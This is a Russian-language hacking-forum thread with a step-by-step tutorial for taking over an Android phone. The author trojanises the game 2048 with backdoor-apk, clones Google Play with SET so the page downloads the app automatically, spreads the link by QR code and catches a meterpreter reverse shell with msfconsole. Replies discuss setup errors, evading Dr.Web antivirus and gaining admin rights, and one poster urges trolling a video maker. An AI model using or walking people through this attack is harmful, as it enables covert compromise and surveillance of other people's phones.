• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Статья Взлом Android - устройства. (Backdoor-apk + HTA server)

Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 453
4 289
Всем привет! В этой теме я хочу показать еще один способ взлома Android – устройства, на мой взгляд, не сложный, но действенный. Использовать будем QR-код, HTA – сервер и естественно Kali Linux.

Взлом Android - устройства. (Backdoor-apk + HTA server)


Для начала нам потребуется софт, для того, чтобы поместить полезную нагрузку в APK – файл. Мы будем использовать Backdoor-apk, скачаем его с Github командой:

> git clone

Взлом Android - устройства. (Backdoor-apk + HTA server)


Затем установим все необходимые библиотеки.

> apt-get install lib32stdc++6 lib32ncurses5 lib32z1

Взлом Android - устройства. (Backdoor-apk + HTA server)


Теперь нам понадобится приложение, в которое мы будем «вшивать» полезную нагрузку, для этого перейдем на сайт apk4fun.com и выберем понравившееся. Сразу оговорюсь, что я перепробовал порядка ста приложений, но большинство из них не компилировалось, при попытке записать нагрузку в него. Еще какая-то часть работала с ошибками. Так же я сталкивался с проблемой, когда сессия отваливались по прошествии 30 – 50 сек после открытия. А именно, когда телефон уходил в ждущий режим и гас экран.

Был интересный момент c Viber, пару раз мне удавалось «вызвать» сессию тогда когда мне было нужно, просто написав сообщение жертве. Но потом эксперимент провалился, приложение перестало работать от слова совсем.


Итак, после нескольких часов тестов я остановился на игре 2048. Как это ни забавно, но именно она работала стабильнее всего, и сессия meterpreter работала корректно.

Качаем именно эту версию, так как другие я просто не пробовал:

Взлом Android - устройства. (Backdoor-apk + HTA server)


Сохраняем файл:

Взлом Android - устройства. (Backdoor-apk + HTA server)


Затем скопируем файл в папку с установленным Backdoor-apk.

Взлом Android - устройства. (Backdoor-apk + HTA server)


Теперь, выполняя по очереди следующие команды, создадим файл с полезной нагрузкой:

> cd backdoor-apk

> cd backdoor-apk

> ./backdoor-apk.sh com.digiplex.game-2.7.2.apk (я сократил ему имя)

Взлом Android - устройства. (Backdoor-apk + HTA server)


Выбираем параметры соответствующие нашим требованиям, я провожу эксперимент в пределах своей локальной сети.

Взлом Android - устройства. (Backdoor-apk + HTA server)


Этот процесс сгенерирует готовый файл в директорию, в моем случае, /root/backdoor-apk/backdoor-apk/original/dist

Взлом Android - устройства. (Backdoor-apk + HTA server)

Взлом Android - устройства. (Backdoor-apk + HTA server)


На этом пока остановимся.

Пришло время запустить SET - Social Engineering Toolkit – набор инструментов для социальной инженерии. Вектор выбранной атаки – это клонирование сайта Google Play и скачивания игры 2048 именно с нашего, клонированного сайта. Дальнейшие действия не должны выходить за рамки приведенной ниже инструкции. Запускаем SET:


> setoolkit

Выбираем:

Взлом Android - устройства. (Backdoor-apk + HTA server)


Выберем Website Attack Vectors.

Взлом Android - устройства. (Backdoor-apk + HTA server)


Нас интересует HTA – Attack Method.

Взлом Android - устройства. (Backdoor-apk + HTA server)


Следующий выбранный пункт – это ввод адреса сайта, который мы склонируем. Базироваться он будет нашей локальной сети, и единственная его цель, это доставить игру с полезной нагрузкой на смартфон цели. Так как по легенде это игра, то клонируем Google Market.

>


Взлом Android - устройства. (Backdoor-apk + HTA server)


Опции, которые будет запрашивать SET вы можете вводить такие же, как и при создании .apk файла. В моем случае 192.168.0.101 и порт 4444. Позже мы все изменим. Терминал с запущенным SET не закрываем.
Итак, Apache работает, ложный сайт склонирован. Если зайдем на адрес 192.168.0.101 с любого компьютера в нашей сети, то в случае успеха, попадем на фэйковый Google Play.

Взлом Android - устройства. (Backdoor-apk + HTA server)


Теперь необходимо инициировать скачивание файла с нашей игрой сразу после перехода на сайт, для этого выполним следующие действия:

· Копируем файл с полезной нагрузкой в директорию /var/www/html (На Kali Linux машине)

· В файле index.html меняем указанную строку. Впишем туда название файла с игрой, но предварительно переименуем ее в Launcher.apk (Ctrl+F поиск по файлу)

Взлом Android - устройства. (Backdoor-apk + HTA server)


Теперь, зайдя на страницу по адресу 192.168.0.101, мы не просто попадаем на ложный Google Play, но и скачиваем автоматически нашу игру 2048 переименованную в Launcher.apk.

Взлом Android - устройства. (Backdoor-apk + HTA server)


Теперь мы оптимизируем процесс установки нашего приложения на целевое устройство.

Для начала установим расширение The QR Code Extension в наш браузер. Я использую Google Chrome.

Взлом Android - устройства. (Backdoor-apk + HTA server)


На целевом устройстве должно присутствовать приложение для считывания QR – кодов, например, QR – Code Reader:

Взлом Android - устройства. (Backdoor-apk + HTA server)


Перейдем на наш фейковый сайт Google Play и сгенерируем QR – код ссылку на него.

Взлом Android - устройства. (Backdoor-apk + HTA server)


Просканировав QR – код с нашего целевого устройства мы скачиваем наш файл с полезной нагрузкой.

Установим игру.

Взлом Android - устройства. (Backdoor-apk + HTA server)


Для получения сессии meterpreter, заранее запустим на исполнение файл backdoor-apk.rc командой:

> msfconsole –r backdoor-apk.rc

Взлом Android - устройства. (Backdoor-apk + HTA server)


И затем, запустим игру.

Взлом Android - устройства. (Backdoor-apk + HTA server)


В консоли получаем активную сессию meterpreter.

Взлом Android - устройства. (Backdoor-apk + HTA server)


На этом все, спасибо за внимание.
 
valerian38

valerian38

Grey Team
20.07.2016
655
741
Спасибо. Всё очень подробно и доходчиво. Будем пробовать.
 
  • Нравится
Реакции: citizen2517 и Vander
K

kiwihaker

[*] Running backdoor-apk.sh v0.1.7 on Вт дек 6 21:13:24 MSK 2016
./backdoor-apk.sh: строка 64: $LOG_FILE: неоднозначное перенаправление
[!] Check your environment and configuration. Couldn't find: msfvenom
 
  • Нравится
Реакции: citizen2517
M

m0tion

Вот видос(не мой), всё очень подробно объясняется.
 
  • Нравится
Реакции: citizen2517
L

Leon

на parrot os 3.1 i386 со способом работала на многих приложениях с установкой oracle java и ручной установкой apktool со способом от kuklofona с apk-embed а на 3.2 parrot никак
 
  • Нравится
Реакции: citizen2517
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
2 990
Вот видос(не мой), всё очень подробно объясняется.
Возможно немного офтоп,за что прошу извинить) Но все же думаю, что достойна внимания моя следующия мысль:

Хочу обратить ваше внимания что видос сделан тупо по статье @Vander которой он опубликовал 5-декабра,срок публикации видео - 7 декабря. К тому же в ходе видео очень много не грамотных разьяснений ,например он сказал что параметр RHOST отвечает за наш локальный айпи" бред - дальше уже можно смело не слушать его...
Так что пойду ка я его обсирать критиковать в коментах. Возможно найдеться группа людей кто поддерживает мое мнение - присойденяйтесь к тролингу)
К тому же хочу заметить что это тот же чел которого обсирал критиковал Ваня Глазков публично за его ламерство.

 
C

codefix

New member
07.02.2017
2
1
Вот интересно если кто сможет на Андройд 6-7 повысить уровень приведений и добавить приложение в состав админ...к примеру на android 6 (galaxy s7) выполнение adb shell pm hide com.. не работает от user, а вот если apk добавлена в группу админ то пожалуйста....
 
  • Нравится
Реакции: citizen2517
S

spike

Вопрос от новичка. Не получается найти пакеты
*
apt-get install lib32stdc++6 lib32ncurses5 lib32z1
Чтение списков пакетов… Готово
Построение дерева зависимостей
Чтение информации о состоянии… Готово
E: Не удалось найти пакет lib32stdc++6
E: Не удалось найти пакет с помощью regex «lib32stdc++6»
E: Не удалось найти пакет lib32ncurses5
E: Не удалось найти пакет lib32z1
*
Подскажите, что делать.
 
  • Нравится
Реакции: citizen2517
D

DoberGroup

Подскажите, что делать.
Рассказать что-нибудь про свою операционку, что бы мы не соревновались в склонности к телепатии.
Ну а за одно, что бы два раза не вставать - выложите список подключенных репозитариев.
 
  • Нравится
Реакции: citizen2517
S

spike

Рассказать что-нибудь про свою операционку, что бы мы не соревновались в склонности к телепатии.
Ну а за одно, что бы два раза не вставать - выложите список подключенных репозитариев.
Kali linux 2.0 64b, установил пару дней назад, за это время ничего не качал и не устанавливал.

Репозитории:
deb cdrom:[Debian GNU/Linux 2016.1 _Kali-rolling_ - Official Snapshot i386 LIVE/INSTALL Binary 20160830-17:39]/ kali-rolling contrib main non-free
deb cdrom:[Debian GNU/Linux 2016.1 _Kali-rolling_ - Official Snapshot i386 LIVE/INSTALL Binary 20160830-17:39]/ kali-rolling contrib main non-free
deb cdrom:[Debian GNU/Linux 2016.1 _Kali-rolling_ - Official Snapshot i386 LIVE/INSTALL Binary 20160830-17:39]/ kali-rolling contrib main non-free
deb kali-rolling main non-free contrib
deb-src kali-rolling main non-free contrib
Поправте, если что
 
  • Нравится
Реакции: citizen2517
ghostphisher

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 515
3 353
В файле index.html меняем указанную строку. Впишем туда название файла с игрой, но предварительно переименуем ее в Launcher.apk (Ctrl+F поиск по файлу)
Не совсем понял - для чего переименовать файл в Launcher.apk, вроде и без этого не плохо и не так подозрительно :)
[doublepost=1487351367,1487312230][/doublepost]И хотел поинтересоваться - сильно отличается от https://codeby.net/threads/vzlom-android-ustrojstva.58136/page-5 ? Я так понял функционал одинаковый, только, как сложилось, дрвеб проглотил созданный при помощи данного способа норм, а при способе по ссылке ( Spade ) спалил на 2 раз. Может кто долго использовал данные фреймы и может написать в чем у них разница координальная?
 
Последнее редактирование:
  • Нравится
Реакции: DoberGroup
Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 453
4 289
Не совсем понял - для чего переименовать файл в Launcher.apk, вроде и без этого не плохо и не так подозрительно :)
Насколько помню, в настройках сервера HTA было прописано имя Launcher.apk, можно поменять и не переименовывать
 
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб